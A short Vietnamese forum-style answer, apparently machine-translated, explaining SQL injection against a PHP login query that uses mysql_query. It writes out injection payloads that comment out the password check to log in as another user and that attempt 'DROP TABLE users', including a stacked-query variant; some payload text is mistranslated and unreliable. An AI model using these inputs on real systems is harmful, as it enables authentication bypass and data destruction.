Điều gì đó như thế này nên làm:
- Để đăng nhập với tư cách người dùng "foo", hãy đặt tên người dùng thành "foo '-"
Điều này sẽ làm cho truy vấn của bạn giống như
$res = mysql_query("SELECT * from users where user='foo' -- ' AND pass=''");
Dấu "-" có nghĩa là phần còn lại của dòng được nhận xét
- Không chắc liệu điều này có hiệu quả hay không nhưng hãy thử đặt tên người dùng thành "foo" HOẶC (DROP TABLE người dùng) - "
Điều này sẽ làm cho truy vấn của bạn giống như sau:
$res = mysql_query("SELECT * from users where user='foo' OR (DROP TABLE users) -- ' AND pass=''");
có thể không chấp nhận điều đó - tôi nghĩ rằng các truy vấn phụ chỉ có thể CHỌN.
Hàm mysql_query sẽ chỉ chạy một truy vấn - các hàm khác sẽ cho phép bạn thực hiện việc này:
$res = mysql_query("SELECT * from users where user='foo'; DROP TABLE users -- ' AND pass=''");
